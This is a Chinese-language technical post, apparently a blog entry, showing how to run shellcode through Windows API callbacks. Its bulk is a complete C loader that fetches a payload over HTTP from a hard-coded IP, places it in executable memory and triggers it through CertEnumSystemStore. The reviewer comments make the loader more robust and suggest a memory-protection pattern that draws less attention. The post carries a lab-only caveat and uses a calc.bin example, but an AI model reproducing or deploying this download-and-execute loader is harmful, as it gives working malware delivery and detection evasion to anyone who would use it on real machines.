GitHub 项目 AlternativeShellcodeExec 中列出了一批可以用来执行 shellcode 的 Windows API：这些 API 都接受一个回调函数指针，把这个指针换成 shellcode 所在内存的地址，API 在内部调用“回调”时就会执行 shellcode。
项目里面还有很多函数可以利用；因为它们都是在当前进程的本地线程里以同样的方式（把回调指针当作 shellcode 入口）来执行的，用法完全一致，所以这里只贴出其中一个完整的利用代码（以 CertEnumSystemStore 为例）。需要注意，下面的代码通过明文 HTTP 从一个写死的 IP 拉取 payload 并且不做任何完整性校验，只适合在自己控制的实验环境里使用。
#include <windows.h>
#include <stdio.h>
#include <wincrypt.h>
#include <WinInet.h>
#pragma comment(lib, "WinInet.lib")
// Requires Crypt32.lib
// 需要在链接器 -> 输入 -> 附加依赖项 中添加如下库
/*
kernel32.lib
user32.lib
gdi32.lib
winspool.lib
comdlg32.lib
advapi32.lib
shell32.lib
ole32.lib
oleaut32.lib
uuid.lib
odbc32.lib
odbccp32.lib
Crypt32.lib
*/
// 定义结构体
// A downloaded payload: a pointer to the raw bytes plus how many of them are valid.
// In this file `shellcode` points at the PAGE_READWRITE region that
// downloadShellcode() obtains with VirtualAlloc; the struct itself does not own or
// release that memory.
struct SHELLCODO {
    char* shellcode;  // raw payload bytes
    int size;         // number of valid bytes at `shellcode`
};
using PSHELLCODE = SHELLCODO*;
// Forward declaration so main() can call it; the definition is further down.
BOOL downloadShellcode(LPCWSTR url, int port, LPCWSTR payloadPath, BOOL isEncrypted, PSHELLCODE pShellcode);
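// Entry point: fetches /calc.bin from the hard-coded host over plain HTTP (port 80
// selects the non-TLS branch of downloadShellcode), copies it into an executable
// region and passes that address to CertEnumSystemStore as the enumeration
// callback, so the API's internal "callback" call lands in the payload.
//
// NOTE(review): the payload travels in cleartext from a fixed IP and nothing
// checks what came back (no hash, no signature), so whoever answers as that host
// or sits on the path decides what gets executed. The region is also allocated
// RWX in one step; a RW-then-RX flip with VirtualProtect would be the less
// conspicuous choice if that matters for the use case.
//
// Returns 0 on success, 1 if the download or the allocation failed.
int main() {
    SHELLCODO shellcode = { 0 };
    // The original discarded this result and went on to VirtualAlloc(0) and copy
    // from a NULL pointer when the download failed; stop here instead.
    BOOL ok = downloadShellcode(L"192.168.1.5", 80, L"/calc.bin", FALSE, &shellcode);
    if (!ok || shellcode.shellcode == NULL || shellcode.size <= 0) {
        printf("[-] shellcode download failed.\n");
        return 1;
    }
    LPVOID addr = ::VirtualAlloc(NULL, shellcode.size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (addr == NULL) {
        printf("[-] VirtualAlloc failed.\n");
        return 1;
    }
    ::RtlMoveMemory(addr, shellcode.shellcode, shellcode.size);
    // The callback pointer is the payload itself.
    ::CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)addr);
    return 0;
}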
// 下载shellcode
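// Downloads a payload with WinInet and hands it back through *pShellcode.
//
// url          host name or IP address to connect to. Despite the name this is not
//              a full URL: the scheme is derived from `port`, the path comes from
//              `payloadPath`.
// port         TCP port. 80 means plain HTTP; ANY other value is treated as HTTPS,
//              so a plain-HTTP listener on e.g. 8080 cannot be used with this
//              function as written.
// payloadPath  request path, e.g. L"/calc.bin".
// isEncrypted  accepted for interface compatibility but currently ignored: no
//              decryption is performed, the bytes are returned exactly as received.
// pShellcode   on success receives a PAGE_READWRITE buffer from VirtualAlloc and
//              its length (caller owns the buffer); left untouched on failure.
//
// Returns TRUE on success, FALSE on any failure (a message is printed to stdout).
//
// NOTE(review): nothing here authenticates the payload. On port 80 it is fetched
// in cleartext, and the HTTPS branch sets INTERNET_FLAG_IGNORE_CERT_CN_INVALID,
// which accepts a certificate issued for a different host name. Whoever can answer
// as `url` therefore chooses the bytes the caller will execute.
BOOL downloadShellcode(LPCWSTR url, int port, LPCWSTR payloadPath, BOOL isEncrypted, PSHELLCODE pShellcode) {
    (void)isEncrypted;  // TODO: no decryption implemented, see header comment
    if (pShellcode == NULL) {
        printf("[-] pShellcode is null.\n");
        return FALSE;
    }

    // Declared up front so the single cleanup section below can release whatever
    // was acquired; the original leaked all three handles on every path.
    HINTERNET hInternet = NULL;
    HINTERNET hHttpSession = NULL;
    HINTERNET hHttpRequest = NULL;
    char* exec = NULL;
    BOOL result = FALSE;

    do {
        hInternet = InternetOpen(0, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
        if (hInternet == NULL) {
            printf("[-] Internet open error.\n");
            break;
        }
        hHttpSession = InternetConnect(hInternet, url, port, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
        if (hHttpSession == NULL) {
            printf("handle is null\n");
            break;
        }

        // Port 80 is the only port that gets plain HTTP; everything else is TLS.
        DWORD flags = INTERNET_FLAG_NO_CACHE_WRITE;
        if (port != 80) {
            // INTERNET_FLAG_IGNORE_CERT_CN_INVALID deliberately weakens certificate
            // checking (host-name mismatch is accepted); kept as in the original.
            flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_NO_COOKIES;
        }
        hHttpRequest = HttpOpenRequest(hHttpSession, L"GET", payloadPath, NULL, L"", NULL, flags, 0);
        if (hHttpRequest == NULL) {
            printf("hHttpRequest is null\n");
            break;
        }

        // The original ignored this status and went on to parse an empty response.
        if (!HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0)) {
            printf("[-] HttpSendRequest failed.\n");
            break;
        }

        // Size the buffer from Content-Length (byte count, as HttpQueryInfo expects).
        // Without the header (chunked responses, error pages) the original ended up
        // with a 0-byte "payload" and still reported success.
        WCHAR lenBuf[32] = { 0 };
        DWORD lenBufSize = sizeof(lenBuf);
        if (!HttpQueryInfo(hHttpRequest, HTTP_QUERY_CONTENT_LENGTH, lenBuf, &lenBufSize, 0)) {
            printf("[-] no Content-Length in response.\n");
            break;
        }
        int declared = _wtoi(lenBuf);
        if (declared <= 0) {
            // A negative value used to wrap to a huge DWORD and reach malloc.
            printf("[-] invalid Content-Length.\n");
            break;
        }
        DWORD fileSize = (DWORD)declared;

        // Read straight into the buffer that is handed back; the original went
        // through an intermediate malloc that was never freed and never checked.
        exec = (char*)VirtualAlloc(0, fileSize, MEM_COMMIT, PAGE_READWRITE);
        if (exec == NULL) {
            printf("[-] VirtualAlloc failed.\n");
            break;
        }

        // InternetReadFile may return fewer bytes than requested; keep reading
        // until the declared size is in or the stream ends.
        DWORD total = 0;
        BOOL readOk = TRUE;
        while (total < fileSize) {
            DWORD got = 0;
            if (!InternetReadFile(hHttpRequest, exec + total, fileSize - total, &got)) {
                printf("write data to memory error.\n");
                readOk = FALSE;
                break;
            }
            if (got == 0) {
                break;  // end of stream
            }
            total += got;
        }
        if (!readOk) {
            break;
        }
        if (total != fileSize) {
            printf("[-] short read: %lu of %lu bytes.\n", (unsigned long)total, (unsigned long)fileSize);
            break;
        }

        pShellcode->shellcode = exec;
        pShellcode->size = (int)fileSize;
        exec = NULL;  // ownership passed to the caller
        result = TRUE;
    } while (0);

    // Single cleanup point: release the buffer if it was not handed out, then the
    // WinInet handles in reverse order of acquisition.
    if (exec != NULL) {
        VirtualFree(exec, 0, MEM_RELEASE);
    }
    if (hHttpRequest != NULL) {
        InternetCloseHandle(hHttpRequest);
    }
    if (hHttpSession != NULL) {
        InternetCloseHandle(hHttpSession);
    }
    if (hInternet != NULL) {
        InternetCloseHandle(hInternet);
    }
    return result;
}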